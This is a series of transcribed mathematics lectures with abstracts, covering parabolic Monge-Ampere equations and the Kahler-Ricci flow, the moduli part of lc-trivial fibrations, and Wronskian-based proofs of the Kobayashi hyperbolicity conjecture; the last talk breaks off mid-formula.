θ_+ is a bit more positive than ω_t, and the latter is exactly the equation satisfied by φ_t. So φ is a sub-solution of this Monge-Ampère flow. The claim is then that u_+ is a super-solution of the same flow if C is large enough — I leave that as a computation — and then you apply the so-called comparison principle: once again we are working with smooth approximants, so this is the classical maximum principle, which tells you that, as the names suggest, the sub-solution is smaller than or equal to the super-solution.
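A compact way to record this barrier argument (a sketch; C and C′ are suitable constants, not specified in the talk, and θ_+ is the fixed Kähler form dominating the ω_t):
\[
\bigl(\theta_+ + i\partial\bar\partial\rho_+\bigr)^{n}=c_+\,g\,dV,
\qquad
u_+(t,x):=\rho_+(x)+Ct+C',
\qquad
\varphi_t\ \le\ u_+(t,\cdot)\ \text{ by the comparison principle.}
\]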
I am running out of time, so I will skip the Lipschitz estimate, which is a bit tricky, and rather say a word about the last estimate, which is probably the newest of the three. Let me give a proof of it under simplifying assumptions, namely F = 0 — this simplifies a bit, but the argument is still a bit technical — and moreover that t ↦ ω_t is affine. In this case the claim is even better: one can get rid of the square, and the estimate is t·∂²_tφ_t ≤ n, a very precise bound on the second time derivative. Why is that? Using dots for time derivatives to simplify my life, consider H(t, x) := t·φ̈_t(x), and a point (t_0, x_0) where H reaches its maximum. Either t_0 = 0 and you are done, or t_0 is positive. In the latter case, the claim is that if you apply the heat-type operator ∂_t − Δ_{ω_t^φ}, where ω_t^φ := ω_t + i∂∂̄φ_t, to the function H, then the result is less than or equal to φ̈_t − (t/n)·φ̈_t². That is the important and slightly tricky computation; let us assume it for a while and look at what happens at (t_0, x_0). At an interior maximum this heat-type operator applied to H is non-negative, so at that point φ̈_t − (t_0/n)·φ̈_t² is non-negative; multiplying by t_0, which is positive, we get t_0φ̈_t − (t_0φ̈_t)²/n ≥ 0, and sending the second term to the other side and dividing by t_0φ̈_t you end up with what you wanted: t_0φ̈_t(x_0) ≤ n, hence H ≤ n everywhere. I was planning to give you the full tricky computation, but I am running out of time, so you will miss it — that was the funniest part of the story. (How much time do I have, Daniel? Five minutes.) So I will skip that, because I need more than five minutes. Where are we? Here are the estimates; let us pretend we have a fully detailed proof of them. Now remember that we are actually arguing by approximation, and we have this kind of information: for each j, φ^j is a solution of an approximating flow and we have these estimates on φ^j. First observation: families of quasi-plurisubharmonic functions, if you understand well the negative part of the curvature, are weakly compact in the L^1 topology, so the first bound tells you that you can extract a subsequence converging in the L^1 sense. Then the second and the third bounds tell you that these families of approximants are locally Lipschitz in time and, furthermore, essentially concave in time; so you can pass to the limit in this weak sense, but also pass to the limit in the time derivative, thanks to the concavity. (Where is my flow? Has it disappeared from the board? Ah, here it is.) So on the right-hand side we can pass to the limit, thanks to this information. I cheated a bit at the beginning when I said that we have tons of continuity results for the Monge-Ampère operator: there is one that we do not have, namely it is not continuous along L^1 convergence. So we need some extra information on how the extracted sequence converges towards the limit. If you look at the equation that the approximants solve, the Monge-Ampère measures of the approximants are given by densities times the fixed measure g dV, and these densities are essentially uniformly bounded from above, thanks to the Lipschitz estimate. In that setting we have strong stability results for solutions of Monge-Ampère equations, and we can prove that the convergence is not merely L^1 but actually holds in the L^∞ sense: the approximants converge uniformly towards the limit. Therefore we can pass to the limit and produce a solution. With some extra minutes that I do not have, you could apply this, for instance, to the long-term behaviour of the Kähler-Ricci flow on singular Calabi-Yau varieties, and obtain in a few lines that the flow deforms any initial datum towards the singular Calabi-Yau metric that Gabor is trying to understand better for us. Thank you.
|
We develop a parabolic pluripotential theory on compact Kähler manifolds, defining and studying weak solutions to degenerate parabolic complex Monge-Ampère equations. We provide a parabolic analogue of the celebrated Bedford-Taylor theory and apply it to the study of the Kähler-Ricci flow on varieties with log terminal singularities.
|
10.5446/53780 (DOI)
|
Thank you very much for the invitation. I will talk about joint work with Vladimir Lazić. Let me start with an introduction of all the objects. In this talk, X and Z will be projective, normal, complex varieties; but more than in varieties I am interested in pairs, so let me briefly recall what a pair is. It is the datum of a variety and a Weil divisor — with rational coefficients for us today — such that K_X + B is Q-Cartier. If you are used to pairs, you may notice that here I am not assuming that B is effective. The objects I study are called klt- or lc-trivial fibrations. They are the data of a pair (X, B) and a fibration f : (X, B) → Z — f is a surjective morphism with connected fibres — and the crucial condition is this one: there exists a Q-Cartier divisor D on Z such that K_X + B is the pullback of D. Then there are some technical conditions. We assume (X, B) to be respectively klt or lc; klt, for Kawamata log terminal, and lc, for log canonical, are regularity conditions that can be checked on the coefficients of B on a suitable birational model of X. Let us say that if X is smooth and B is simple normal crossing, writing B as the sum of its irreducible summands, B = Σ b_i B_i, then lc becomes b_i ≤ 1 for all i, and klt is the same inequality but strict. Then we have another condition, which I will not state, but I will tell you what it does: it makes B behave almost as an effective divisor. Conditions four and five are technical conditions. What makes these fibrations special is condition three: for instance, if B equals zero and you restrict to a general fibre, you see that a general fibre has trivial canonical divisor. So this is a restriction on the geometry of the fibration and of X. Maybe some examples. The first example I want to give is that of relatively minimal elliptic fibrations: X is a smooth surface, C is a smooth curve, and the general fibre is an elliptic curve; relatively minimal means that there are no (−1)-curves inside the fibres. If f is a relatively minimal elliptic fibration, then f : (X, 0) → C is a klt-trivial fibration. For the second example, we take X = P¹ × P¹ and D a divisor of bidegree (d, k) on X, say D reduced and d at least 2. Then the second projection f : (X, (2/d)D) → P¹ is an lc-trivial fibration. These two examples show two very different situations: in the first one the fibres vary — they are not all isomorphic — and in the second the fibre does not vary at all, so X is a product, but the interesting geometry is given by the boundary.
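In symbols, the key condition (3) and the regularity conditions just described read as follows (a sketch, omitting the technical conditions (4)–(5) mentioned above; the pullback relation is written as a Q-linear equivalence, which is how such formulas are usually read, and the B_i are the irreducible components of B on a suitable log resolution):
\[
K_X + B \;\sim_{\mathbb{Q}}\; f^{*}D \quad\text{with } D \ \mathbb{Q}\text{-Cartier on } Z,
\qquad
B=\sum_i b_i B_i,\quad
\text{lc: } b_i\le 1,\ \ \text{klt: } b_i<1 .
\]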
So in the second example it is the points that move inside the fibres. Maybe I can convince you that this is indeed an lc-trivial fibration: K_X + (2/d)D — the canonical divisor has bidegree (−2, −2), and (2/d)D has bidegree (2, 2k/d) — so the sum has degree zero on the fibres of the second projection, and therefore it is a pullback from the base. Now we consider an lc-trivial fibration and we define an object called the discriminant. It is defined by a formula; let me write the formula and then tell you what it is. It is a sum, over the irreducible and reduced subvarieties P of codimension one in Z, of the coefficients (1 − γ_P) times P, where γ_P is again defined by a formula: we take the supremum over all the non-negative real numbers t such that the pair (X, B + t f^*P) is lc over the generic point of P. What does this mean? lc, as we said, is a regularity condition, checked on coefficients: write B + t f^*P as a sum of prime divisors with coefficients; then "over the generic point of P" means that I check the lc condition only on those components whose image under f is exactly P. Maybe this is not super clear yet, but let me first state some facts. Fact: the discriminant B_Z is a Q-divisor, so the sum is finite and the γ_P are rational numbers. Then there is another important property, proved by Ambro: if K_Z + B_Z is Q-Cartier and the boundary B is effective, then the singularities of the pair (X, B) appear exactly as the singularities of the pair (Z, B_Z); this is a manifestation of inversion of adjunction, which has already been mentioned. Let me also say a word about what this object really is. If γ_P equals 1, it means that the pair (X, B + f^*P) has the regularity condition log canonical — it is regular in the category of regularity that we have chosen; if γ_P is less than 1, then the same pair does not have this regularity condition, so it is more singular. So we can look at the support of B_Z: it is the union of all the codimension-one subvarieties over which this pair is singular. It is a sort of singular locus of f, seen from pairs rather than varieties: the discriminant detects the singularities of f. Now I can introduce another object, called the moduli part. It is defined as M_Z := D − K_Z − B_Z, where, let me recall, D is the divisor from the definition, the one still on the board. (Question from the audience.) This is a good point: a priori it is just a divisor; in a moment I will state a result which says that, under a suitable condition, on a suitable model it carries all the information — and the right condition is already on the board. Before telling you the properties of M, I would like to do a small construction. Say we have an lc-trivial fibration f and we consider a birational map Z′ → Z. We can take a resolution X′ of the fibre product X ×_Z Z′, which comes with two natural maps, f′ : X′ → Z′ and τ : X′ → X. Then I define a boundary B_{X′} on X′ just by requiring the equality K_{X′} + B_{X′} = τ^*(K_X + B) to hold. With this boundary, f′ is an lc-trivial fibration, and therefore it has a discriminant and a moduli part; so, whenever I take a base change, B_{Z′} and M_{Z′} implicitly denote the discriminant and the moduli part of the fibration obtained by the base change.
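For later reference, the discriminant and the moduli part just defined can be written as follows (a sketch of the formulas described above; P runs over the prime divisors of Z):
\[
\gamma_P=\sup\{\,t\ge 0 \;:\; (X,\,B+t\,f^{*}P)\ \text{is lc over the generic point of } P\,\},
\qquad
B_Z=\sum_P (1-\gamma_P)\,P,
\qquad
M_Z=D-K_Z-B_Z .
\]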
What makes the moduli part special is the following result, proved in different degrees of generality by many people: Ambro, Kawamata, Kollár, and Fujino–Gongyo. Consider an lc-trivial fibration. Then we can find a birational model Z′ of Z such that, first, K_{Z′} + B_{Z′} is Q-Cartier — equivalently, M_{Z′} is Q-Cartier — and M_{Z′} is nef; and, second, for every further birational base change Z′′ → Z′, the moduli part M_{Z′′} is just the pullback of M_{Z′}, and K_{Z′′} + B_{Z′′} is the pullback of K_{Z′} + B_{Z′}. So on Z′ all the properties of M appear. We say that the canonical bundle formula of f is this way of writing K_X + B as the pullback of the sum of three divisors: the canonical divisor of the base, the discriminant, which detects the singularities, and the moduli part, which enjoys these positivity properties. But more than that, the moduli part is supposed to detect the properties of the fibres in moduli — whether the fibres vary or not, whether they are all isomorphic or not. Let me give the first example of a canonical bundle formula, for elliptic fibrations: if f is an elliptic fibration, then there is a theorem of Kodaira and Ueno saying that twelve times the moduli part is the pullback, under the map induced by the j-invariant of the fibres, of a divisor of degree one on P¹. This motivates at least the name: if all the fibres of the elliptic fibration are isomorphic, this map is constant and therefore M_C is trivial; otherwise it is ample. Another important motivation is another result by Ambro: if f is a klt-trivial fibration and M_Z is torsion, then, perhaps after a finite base change, X is a product and f is the projection. The first conjecture about the moduli part states that a similar property should be true all the time. The conjecture, stated by Prokhorov and Shokurov, is that we should be able to find a birational model and a natural number m such that m·M_{Z′} is base point free; and, for later use, I will record the dependence on k: the conjecture in dimension k is the statement for bases of dimension k. (Question: in the triviality theorem? — Yes, there is such a statement, but it is for klt; it is not true for lc.) This conjecture is wide open and probably very hard. It has been proved in some special cases: if the fibres have dimension one, by Kodaira–Ueno and by Prokhorov and Shokurov; if the fibres have dimension two but are not P², by Fujino, and there are some further partial results; and if the fibres are abelian varieties, again by Fujino. Most of these results — everything apart from some of the two-dimensional fibre cases — use the existence of moduli spaces for the fibres. And there is another result, for the case when M_Z is numerically zero; recall that M_Z numerically zero means that M_Z has zero intersection with every curve in Z. This is a result by Ambro in the klt case, and I proved it in the lc case: if M_Z is numerically zero, then it is a torsion divisor. The immediate corollary of this result is that the conjecture is true when the base has dimension one. Now I have given all the important definitions and some of the results, and I can state what we proved with Vladimir Lazić. I will state the theorem in two parts. The first part is that it is enough to prove the conjecture when the moduli part is big.
Recall that a divisor is big if it is the sum of an ample and an effective divisor. The second part of the theorem is the following: we assume the conjecture in dimension k − 1; then for every subvariety T of Z of codimension one we can prove that the restriction of the moduli part to T is b-semi-ample — a notion I have not defined yet. What does b-semi-ample mean? The two displayed lines in the conjecture are exactly the definition: the "b" stands for birational, and the existence of an m such that the multiple m·M_{Z′} is base point free is the semi-ampleness. (Question: is this supposed to hold for every Ambro model?) You are right — we should say that Z′ dominates an Ambro model, that is, that Z′ is as in the theorem of Ambro, Kawamata, Kollár and Fujino–Gongyo; then the semi-ampleness is proved not on an arbitrary model, but on one where all the important information appears. Now I have to say something about motivation. The first type of motivation is more technical, with respect to the result: as a corollary, maybe of the methods more than of the result, we obtain the following. Assume the conjecture for bases of dimension k − 2 (recall that, in the statement, the base of my lc-trivial fibration has dimension k, so T has dimension k − 1 — I apologize, I hope this is clear from the context). Let f be an lc-trivial fibration with dim Z = k, assume that M_Z is big, and assume that the support of the discriminant together with the augmented base locus of M_Z is simple normal crossing — I will tell you in a second what the augmented base locus is. Then for every codimension-one component of this locus, the restriction of M_Z to it is semi-ample. And here is the reminder: the augmented base locus B_+ of a big divisor is the locus where M_Z is not ample; it is defined as the intersection of the supports of all the effective divisors E such that M_Z can be written as the sum of an ample divisor and E, and it contains the base locus of M_Z, the locus where M_Z is not semi-ample. So this result can be seen as an exploration of the base locus of M_Z: the behaviour of the moduli part along the base locus. Okay, this was the first motivation, but maybe more importantly — and these are motivations to study the conjecture more than this exact result — if we have a pair, the object canonically attached to it is K_X + B; so if we want to study the pair we take this object and squeeze as much information as we can out of it. The first thing to do is to look at the global sections of its multiples: taking all the spaces of global sections together, they form a ring, called the canonical ring.
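For concreteness, the ring just mentioned is the following standard object (a sketch; the round-down makes the multiples integral divisors):
\[
R(X,\,K_X+B)\;=\;\bigoplus_{m\ge 0} H^{0}\bigl(X,\ \mathcal{O}_X(\lfloor m(K_X+B)\rfloor)\bigr).
\]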
And it turns out that for a lot of difficult questions the lc case is very important, and in order to try to reproduce their strategy in the lc case this conjecture could be really useful. So this is a reason for the importance of the b-semiampleness conjecture. I have about fifteen minutes left, so I can give you some ideas from the proof. We will just treat a baby case: I will assume that M_Z is big and that the dimension of Z is 2, and I also assume that Z is Z', a model where M_Z is nef and such that on every other birational model I just obtain the pullback. There is a theorem by Nakayama that says that in this situation the B_+ of M_Z is the union of all the curves which have zero intersection with M_Z. So I will tell you how to prove our result for a component T of the B_+, in dimension 2, with M_Z big. Just recall that we have f: (X, B) -> Z; I will also assume that the preimage of T, which I call X_T, is smooth. Of course this is not always true, but it will make the proof a little easier to follow. So we write the canonical bundle formula for f, we add X_T on both sides, and on the left-hand side we use adjunction. We obtain that K_{X_T} plus the restriction of B to X_T is the pullback of K_T plus the restrictions of the other divisors. In particular this shows that the restriction is an lc-trivial fibration, so we write its own canonical bundle formula, and maybe its discriminant and moduli part are different. [Question: have you checked the comparison?] Sure, you are right; I am also assuming for simplicity that gamma_T is one. It is not in general, of course, thanks. So we have this pullback and the canonical bundle formula, and then there is something I will not prove but will just state as a slogan: the restricted fibration is more singular than the fibration we started with. Of course this sentence has to be made precise and proved, but it implies that the discriminant of the restricted fibration is bigger than or equal to the restriction of the discriminant, and therefore we have the opposite inequality for the moduli parts. But now, how did we choose T? T is a component of the B_+ of M_Z, so M_Z restricted to T is numerically trivial, and T is a curve, so the moduli part of the restriction is nef. These two properties, together with the inequality, imply that M_T is numerically equivalent to M_Z restricted to T. And, it is still on the blackboard, the conjecture has been proved when the base has dimension one, so M_T is semiample, and hence so is the restriction of M_Z to T. This concludes the proof of the baby case. Of course, in general the hypotheses I have made are not satisfied: for instance one has to take a suitable multiple of X_T when gamma_T is different from one, in order to obtain lc pairs everywhere; if X_T is not smooth there is a sub-adjunction argument; and the very vague slogan has to be proved with an MMP technique, which we adapted a little but which is very much inspired by a paper of Fujino and Gongyo. I will stop here. Thank you for your attention. Thank you.
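For the record, the restriction step in the baby case can be summarised in one display; this is only a sketch, under the simplifying assumptions the speaker makes (X_T smooth and gamma_T = 1).
\[
\bigl(K_X + B + X_T\bigr)\big|_{X_T} \;=\; K_{X_T} + B|_{X_T}
\;=\; \bigl(f|_{X_T}\bigr)^{*}\bigl(K_T + B_T + M_T\bigr),
\]
with \(B_T \ge B_Z|_T\) and hence \(M_T \le M_Z|_T\); since \(T \subset \mathbf{B}_+(M_Z)\) is a curve with \(M_Z \cdot T = 0\) and \(M_T\) is nef, this forces \(M_T \equiv M_Z|_T\), and the dimension-one case of the conjecture then gives semiampleness.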
|
An lc-trivial fibration $f : (X, B) \to Y$ is a fibration such that the log-canonical divisor of the pair $(X, B)$ is trivial along the fibres of $f$. As in the case of the canonical bundle formula for elliptic fibrations, the log-canonical divisor can be written as the sum of the pullback of three divisors: the canonical divisor of $Y$; a divisor, called discriminant, which contains informations on the singular fibres; a divisor, called moduli part, that contains informations on the variation in moduli of the fibres. The moduli part is conjectured to be semiample. Ambro proved the conjecture when the base $Y$ is a curve. In this talk we will explain how to prove that the restriction of the moduli part to a hypersurface is semiample assuming the conjecture in lower dimension.
|
10.5446/53782 (DOI)
|
Thank you very much. First I would like to thank the organizers for another opportunity to explain things that I work on in mathematics. I am going to discuss essentially the Kobayashi conjecture, which is now no longer a conjecture but a theorem, although there are still many things to be improved and developed further. The setting is the study of projective algebraic varieties over the complex numbers, and one considers entire curves. An entire curve is just a holomorphic, non-constant map from the complex line into X. By definition, X is said to be Brody hyperbolic if there are no such entire curves. It is well known, because X is compact, that Brody hyperbolicity is equivalent to Kobayashi hyperbolicity in the sense of the Kobayashi metric. Now the Kobayashi conjecture, which goes back to the 70s, is that if you take X of dimension n, a hypersurface in complex projective space of degree d, then there should exist d_n, depending on the dimension, such that for X general, meaning a point in a Zariski open set in the parameter space of hypersurfaces, and degree d at least d_n, X should be hyperbolic in either sense. What are the expectations for this d_n? In fact there is a very strong, essentially unsolved conjecture at this point, the Green-Griffiths-Lang conjecture, which says that if X is of general type, in the sense that the canonical bundle is big, then there should exist a proper algebraic subvariety containing all the entire curves; and in fact it is expected that these conditions are equivalent. If the conjecture is settled, then you can apply well-known results of Clemens, Claire Voisin, Pacienza and Ein; using these results you can convert the problem into a purely algebraic characterization. So you would have the following characterization of hyperbolicity for projective varieties: X would be Kobayashi hyperbolic if and only if every algebraic subvariety Y of X is of general type. This is an immediate consequence of the Green-Griffiths-Lang conjecture as stated above. Because that condition is purely algebraic and has been analysed by Clemens, Ein, Voisin and Pacienza, and we know when a general hypersurface satisfies it, it follows that you could take d_1 = 4, so plane curves of degree 4 are hyperbolic; d_n = 2n + 1 for n between 2 and 4; and d_n = 2n for n at least 5. These bounds would be optimal, for very general hypersurfaces at least in low degree. As you will see, for large enough degree, general is enough; there may be some range of very low degrees where you might need very general. If you are very optimistic, maybe general is enough everywhere; I tend to be optimistic. Okay, so now let me come to what is known: proofs of the Kobayashi conjecture. I should say proofs, since there are several proofs now. My goal today is to try to explain a proof that is as simple as possible, and I will try to give all the arguments. The first attempt at a proof was by Siu, who gave a lot of the arguments already in 2002 at the Abel conference; the paper was finally published in Inventiones Mathematicae in 2015. The paper is rather long and difficult, and it uses a lot of Nevanlinna theory, plus many things related to jet differentials and such ideas. And then a more geometric proof was found by Damien Brotbek more recently, in 2016.
So a shorter and more geometric proof, which I will essentially explain now; it is a variation of Damien's proof, but, I think, a little simpler. In those first two proofs there were no estimates for d_n, just the existence of d_n, unspecified. It turns out that Brotbek's proof can be made effective: Ya Deng, very shortly after Brotbek's paper was posted on the arXiv, turned the proof into an effective version and got values of d_n stated as (n+1)^{n+2} multiplied by (n+2)^{n+7}, which is roughly something like n^{3n+9}; but it turns out that by the same proof you can improve a little bit, to essentially n^{2n+4}, maybe slightly more than this. That proof is based also on ideas that led to a solution of the Debarre conjecture. And now I will present another, even simpler variation of the argument, I believe, with a bound that is possibly of the same size, well, a little bit bigger: something like (en)^{2n+2}, where e is exp(1). My guess is that you can still improve it; I still don't know exactly what you can reach with this method, but it is only a little less. Okay, so what is the basic idea? The idea is that entire curves have to satisfy many differential equations, ODEs. These ODEs I will write in the form P(f) = 0, where P is an algebraic differential operator given by a sum of coefficients a_alpha(f) multiplied by a polynomial in the derivatives: the first derivative raised to some exponent alpha_1, the second derivative to some exponent alpha_2, and so on up to the k-th derivative to some exponent alpha_k. Then you count the weighted degree, which is |alpha_1| + 2|alpha_2| + ... + k|alpha_k|. These are multi-indices: you write f locally as an n-tuple, and these are actually monomials in the components; the a_alpha are just locally holomorphic coefficients on the ambient manifold X. Of course, if X is projective and you have a global object, it is going to be algebraic. Okay, so now there is a further condition: you want equations that depend only on the geometry of the curve and not on its parameterization. So if you reparametrize, say you compose your curve with some entire map phi from C to C, not necessarily a bijection of C because you don't have many, but any entire map, so you replace your curve f by f composed with phi, then you want the condition that P(f composed with phi) equals (phi')^m times P(f) composed with phi. These are the so-called invariant polynomial differential operators, and they describe the geometry of the curve and not the way the curve is parameterized. Now if you look at the coefficients, these are linear conditions on the coefficients, and they describe a bundle. So you introduce the bundle, which I will denote E_{k,m} T*_X, because somehow these are tensors in the cotangent bundle, of invariant algebraic differential operators. And now, to get these ODEs, you use the fundamental vanishing theorem.
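Recapping the two conditions just described in LaTeX; the multi-index shorthand is a standard convention I am adding, not something written on the board.
\[
P(f) \;=\; \sum_{\alpha} a_{\alpha}(f)\,(f')^{\alpha_1}(f'')^{\alpha_2}\cdots\bigl(f^{(k)}\bigr)^{\alpha_k},
\qquad
m \;=\; |\alpha_1| + 2|\alpha_2| + \cdots + k|\alpha_k|,
\]
\[
P(f\circ\varphi) \;=\; (\varphi')^{m}\,\bigl(P(f)\circ\varphi\bigr)
\quad\text{for every local reparametrization } \varphi .
\]
Operators satisfying the second condition are exactly the sections of the bundle \(E_{k,m}T^{*}_X\) mentioned above.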
Actually, it goes back to Bloch already in 1926 in some form, but the general form was stated by Green-Griffiths, and the complete proof was given by Siu and Yeung; I wrote a proof in 1995 which is somewhat different. The statement is that for every projective algebraic X, for every entire curve from C to X, and for every global differential operator, provided you take an operator that vanishes on some ample divisor, so you twist by O(-A) with A ample, then automatically P(f) = 0. Okay, so if you happen to be able to construct such operators, meaning sections of this bundle whose coefficients a_alpha vanish along A, you automatically get that the entire curves are solutions of a lot of differential equations. If there are enough differential equations, then possibly you can exclude the existence of entire curves. This is the question of the base locus, and you have to study the base locus. Of course, you have one reason to be optimistic, especially in view of proving the Green-Griffiths-Lang conjecture if you are extremely optimistic: this space of sections is actually non-zero, and big, if X is of general type. This is a theorem I proved in 2010, which appeared in 2011: if X is of general type, then this bundle has a lot of sections; the number grows as fast as possible when m is large compared to k and k is large, and you can specify what "large" means in terms of Chern classes, this can be computed. Okay, so they exist, but you don't have much control on them, and you don't have much control on the base locus; that's the main problem. But there are easier ways, and this is what I am going to concentrate on: you have simple sections provided by Wronskians. This was used in an essential way by Damien Brotbek, also by other people; it actually goes back to Cartan and a lot of earlier work. So suppose you take sections s_0, ..., s_k of some auxiliary line bundle L. Then you define a Wronskian operator, one of those differential operators, W_{s_0, s_1, ..., s_k} acting on f: you take the determinant of the derivatives of the sections s_j composed with the curve f, and you need a square matrix, so you take i and j between 0 and k; it is a (k+1) by (k+1) determinant. In fact it is not necessary to take global sections; you can take sections on some open set U in X. If you do this, you get a differential operator, the Wronskian associated with s_0, s_1, ..., s_k, which you have to organise according to this notation. It is of order k, in the sense that it involves derivatives up to order k and not more, and the total degree, counting the number of primes involved in the monomials, the m from before, is easy to see: for a Wronskian it is k(k+1)/2, that is, 1 + 2 + ... + k. And of course it is defined only over U. In Brotbek's notation, k' means k(k+1)/2. But then it is not scalar valued; it is not scalar valued because, well, you have an easy formula for Wronskians.
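In formulas, the operator just described is the following; this is a recap in the notation above, with the sections trivialized over U.
\[
W_{s_0,\dots,s_k}(f) \;=\; \det\Bigl(\bigl(s_j \circ f\bigr)^{(i)}\Bigr)_{0 \le i,j \le k},
\]
an invariant differential operator of order \(k\) and weighted degree \(k' = \tfrac{k(k+1)}{2}\).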
If you multiply the sections by a function g, then g enters with the power k+1 in the Wronskian. You have this formula, which tells you that although you may have to compute in coordinates, the result is independent of the coordinates; and it tells you that the Wronskian takes its values in L^{k+1}. So it is not scalar valued, but has values in the (k+1)-st power of the auxiliary line bundle L. And of course, if you take U to be X, you do get a global section. But unfortunately you are likely to get global sections only if you take L to be positive, say ample, and then the power L^{k+1} that appears is also ample, which does not fit with the vanishing theorem, because there you need something negative. So the only thing you can do, and this is the next idea, is to try to simplify the Wronskian by a large factor, to convert this positive twist into a negative one; you want a big simplification, you want to divide the Wronskian by something big. So you want to divide, or simplify, Wronskians by a large factor when possible. Let me first give you an easy example, the case of the Fermat hypersurface. Take the Fermat hypersurface of degree d, say z_0^d + z_1^d + ... + z_N^d = 0, a hypersurface in complex projective space of dimension N, so that X has dimension n = N - 1. You take the Wronskian associated with the monomials z_j^d, but instead of going up to the last one you stop at z_{N-1}, so I am taking k = N - 1 here. So this is just the determinant of the derivatives of the components of the curve in homogeneous coordinates, raised to the power d, with derivatives up to order k at most. If d is large, this is divisible by f_j^{d-k}; in fact, as a section, it is divisible by the corresponding equations, because looking at the coefficients of the Wronskian operator in terms of the z's, it is divisible by the product over j from 0 to k of z_j^{d-k}. Now let's count what is left after dividing: (1 over the product over j from 0 to k of z_j^{d-k}) times this Wronskian lies in H^0 of X of E_{k,k'} T*_X tensored with a power of L, where L is just O(1): I had a factor (k+1)d, but then I subtract (k+1)(d-k), so I am left with a twist of order k(k+1). Unfortunately this is still not negative, but at least it is independent of d. So you can take the degree arbitrarily large and the exponent does not grow with the degree. So if you were able to find just one extra factor in the division, since this does not depend on d and d is very large, you would win after dividing by that extra factor. And here you win, because of the relation: I stopped at z_{N-1}, but I can replace z_0^d by minus (z_1^d + ... + z_N^d). So in the Wronskian starting with z_0^d, I replace z_0^d using this relation and the multilinearity of the Wronskian, and then all the other terms vanish because they already appear among the columns, so I get a minus sign.
So I get minus the Wronskian of z_N^d, z_1^d, ..., up to z_k^d, which is z_{N-1}^d, and this is also divisible by the extra factor z_N^{d-k}. After this extra division there are now k+2 factors of degree d-k in the denominator, so the twist drops by an extra d - k, and now I win: success if d is larger than k(k+2), and therefore d = (k+1)^2 is enough, and (k+1)^2 is just N^2. This has been standard for a long time; possibly not stated exactly this way, but there have been a lot of proofs, especially in Japan, exploiting this property, worked on in particular by Noguchi and collaborators, trying to find explicit examples of hyperbolic hypersurfaces with explicit coefficients and trying to improve the degrees. Of course, the Fermat hypersurface itself is not hyperbolic, because the Fermat hypersurface contains a lot of rational curves. So you cannot expect the Fermat to be hyperbolic, but what you can do is take this Fermat, which has dimension N - 1 in P^N, of degree d larger than N^2, and then you cut by a general linear projective subspace V; it turns out you can essentially proceed by induction in that way, and you have a very cheap argument, which was actually carried out by Shiffman and Zaidenberg. [Question: V is a projective hyperplane?] Not a hyperplane: the Fermat is codimension 1 in P^N, and if you cut with a linear P^{n+1} you get something n-dimensional, a hypersurface in V, and V is isomorphic to P^{n+1}. (Excuse me, at this point small n + 1 is no longer capital N; I was confusing the notation. My small n now has nothing to do with capital N; it is smaller, in fact roughly half of capital N.) So you take n to be roughly the integer part of N/2, and this is enough to kill the rational curves contained in the Fermat hypersurface, and then you easily see, using Shiffman and Zaidenberg's idea, that this section is actually hyperbolic for V general. And then you get the very low degree example: d equal to N^2, but N is roughly 2n, so this is like 4n^2. So you get examples of hyperbolic hypersurfaces of degree roughly 4n^2. But unfortunately, this is general in the family of linear sections, not in the family of all hypersurfaces. So unfortunately this construction, which is very simple, is not enough to prove the genericity of hyperbolicity in the Kobayashi conjecture. In fact, the reason is that we have some very exceptional geometry here and we can argue with only one Wronskian. To proceed further we need more Wronskians, or at least the possibility of having more Wronskians with this division property. So we need more Wronskians with the divisibility property. And I am going to prove the following theorem along these lines; it should be attributed to the community rather than to me. I wrote up the details, but the ideas were already there.
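A sketch of the bookkeeping in the Fermat example, under the conventions above (k = N - 1, L = O(1)); the arithmetic is mine, but it only uses the degrees stated in the talk.
\[
\frac{W\bigl(z_0^{\,d},\dots,z_k^{\,d}\bigr)}{\prod_{j=0}^{k} z_j^{\,d-k}}
\ \in\ H^0\!\Bigl(X,\; E_{k,k'}T^{*}_X \otimes \mathcal{O}\bigl((k+1)d - (k+1)(d-k)\bigr)\Bigr)
\;=\; H^0\!\bigl(X,\; E_{k,k'}T^{*}_X \otimes \mathcal{O}(k(k+1))\bigr),
\]
and after the extra division by \(z_N^{\,d-k}\) coming from the Fermat relation the twist becomes \(k(k+2) - d\), which is negative as soon as \(d > k(k+2)\); in particular \(d \ge (k+1)^2 = N^2\) suffices.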
So you take Z to be a projective variety of dimension n+1; you take hypersurfaces not just in projective space but in an arbitrary projective variety. And A very ample on Z. Now you take a general section sigma of degree d with respect to A on Z, with d larger than the number I gave you, (en)^{2n+2}; well, you can prove a little better. Then the hypersurface X, the zero divisor of sigma, smooth of course because A is very ample and sigma is general, is going to be Kobayashi hyperbolic. And how do you prove that? You specify a very good choice of section sigma_0 that has a lot of Wronskians, a very good sigma_0 for which X_0 has many Wronskians; I have to explain what I mean by "many". It turns out that there is a general construction of what are called Semple bundles. I am not going to define them; they are jet bundles due to the British mathematician Semple in the 50s, and in the context of hyperbolicity I realized in the 90s that they are very useful. So you have a tower: X_0 is just the given X, and then you have a tower of P^{n-1}-bundles, and at each step it is the projectivization of a vector bundle: on X_{k-1} you have a vector bundle, and taking its projectivization you get X_k. I will not repeat the construction, but because each step is a projectivization, each X_k carries a tautological line bundle O_{X_k}(1), and similarly on X_1, and so on. And then it turns out that the bundle I explained, E_{k,m} T*_X, is just the direct image, under the projection pi_k from X_k to X_0, of the m-th power of this tautological line bundle on X_k. This is established in my Santa Cruz notes of 1995; there was a lot of work by other people at the same time, done independently. Now you can look at the local Wronskians: you take sections s_0, ..., s_k in some neighborhood of a point of X, just holomorphic functions, which of course exist only locally on a small neighborhood U of a given point. Then you can construct sections of O_{X_k}(k') associated with these: the local Wronskians, which are only local, and by pulling back they correspond to sections of O_{X_k}(k') on pi_k^{-1}(U). And it turns out that this bundle is not relatively generated by sections; it is only relatively big, and there is a universal ideal sheaf, in fact a base locus common to all the local Wronskians. You have infinitely many such functions, take U to be a ball, say, but even though you have an enormous amount of functions on the ball, these Wronskians still do not generate the bundle O_{X_k}(1) along the fibres. What they generate, in fact, is O_{X_k}(k'), with k' equal to k(k+1)/2, twisted by some universal ideal sheaf, say I_k. Whatever Wronskian you take, along the fibres it is going to vanish according to this ideal, and you cannot do better: this is the largest possible ideal that you get with Wronskians; there is no way to get something that does not vanish.
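Summarizing the tower and the direct image identity in symbols; this recaps what is described above, and the notation V_{k-1} for the intermediate vector bundles is mine.
\[
X_0 = X, \qquad X_k = \mathbb{P}(V_{k-1}) \longrightarrow X_{k-1},
\qquad
(\pi_k)_{*}\,\mathcal{O}_{X_k}(m) \;=\; E_{k,m}T^{*}_{X},
\]
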